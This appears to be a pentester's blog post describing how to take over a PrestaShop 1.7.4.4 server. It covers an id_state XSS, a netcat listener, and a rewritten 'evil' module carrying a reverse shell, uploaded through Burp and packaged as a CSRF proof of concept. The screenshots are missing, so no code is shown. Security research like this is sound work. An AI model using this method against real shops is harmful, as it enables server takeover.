czwartek, 9 kwietnia 2020

Creating evil module for PrestaShop

Yesterday I decided to check PrestaShop (VM available at TurnKeyLinux) 1.7.4.4. Below you'll find few notes. Here we go...
Today we'll start here:


I was wondering how to prepare a 'working module' that will be able to connect us to PrestaShop server somehow. (Similar story you'll find described here or here.) So I started from admin's panel this time: more precisely I started from the Database -> SQL Manager:


Interestingly:


I decided it will be a good start of the journey. ;)

Next case: Advanced Parameters -> E-mail:


Well ;] It was interesting enough to prepare a netcat on my Kali VM:

 
In case of the file prepared on listening port:


At this stage I was looking for those error messages in the source code:


I started somewhere here:


Next step:


Checking error message function(s):


Next step:


Learning more:


And I found it:


Next case: id_state vulnerable for XSS:


Quick response from PrestaShop:




As we can see injection is located directly in JS, so I changed my payload, like this:


Now response looks better:


Checking the source code again:

Next step:


There is a file_put_content function, so I was wondering if I can use it somehow:


Looking deeper:


More source to check:


So the idea was simple: we can upload 'any' compressed archive (zip/tar/tgz) as a PrestaShop module. So (in case of creating an 'evil one' ) the easiest way to do it is: download valid existing module and rewrite it a little bit. I started here:


Simple modification:


Preparing upload:

Intercepting request with Burp:


All's good - so?

Checking - and unfortunately my module wasn't added at all. ;[

I tried with another one called spiderbk:


Looks good. But why this time I was able to upload a zip-module...?

Checking again:


It works again! I decided to compare both modules. The reason of my mistake during first upload was that PrestaShop (in 1.7 version afaik) is checking hash value(s) of files in the module archive.

...and that's how I found this page (thanks!):


As you can see there is "Min Version" - we'll use it ;)


When I uploaded the ZIP file I tried to locate the file(s) of my new module. This is what I found:

So far, so good. Next stage - prepare a working reverse shell:

Module is rewrited again, so we can upload it one more time (remember to prepare netcat on your Kali VM):


When upload is ready - we should be somewhere here:



Request to upload the file...


... can be 'extracted' from Burp using "Engagements tools -> Generate CSRF poc":


I saved the request to the HTML file on my disk:


Checking:


I think it's done. ;)

Remember to use it only for legal pentests!

See you next time!

Cheers

















Posted by at
Labels: , , ,

Brak komentarzy:

Prześlij komentarz

Subskrybuj: Komentarze do posta (Atom)